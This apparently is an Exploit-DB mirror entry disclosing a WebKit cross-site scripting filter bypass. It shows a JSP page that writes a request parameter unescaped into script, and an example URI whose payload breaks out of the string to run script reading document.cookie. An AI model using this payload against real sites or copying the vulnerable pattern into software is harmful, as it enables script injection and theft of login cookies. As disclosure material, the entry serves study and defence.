exploit-db-mirror/platforms/php/webapps/38024.txt
Offensive Security 270dc872cf DB: 2015-09-01
17 new exploits
2015-09-01 05:02:37 +00:00

17 lines
No EOL
593 B
Text
Executable file

source: http://www.securityfocus.com/bid/56570/info
WebKit is prone to a security-bypass vulnerability.
An attacker can exploit this vulnerability to bypass the cross-site scripting filter mechanism. Successful exploits may allow attackers to execute arbitrary script code and steal cookie-based authentication credentials.
Code in test.jsp:
<title>Test Page</title>
<script>
var foo = "<%= request.getParameter("foo") %>";
document.write("<text>Welcome "+ foo + "</text>");
</script>
Example URI:
http://www.domain.com/test.jsp?foo=2"; alert(document.cookie); var a="1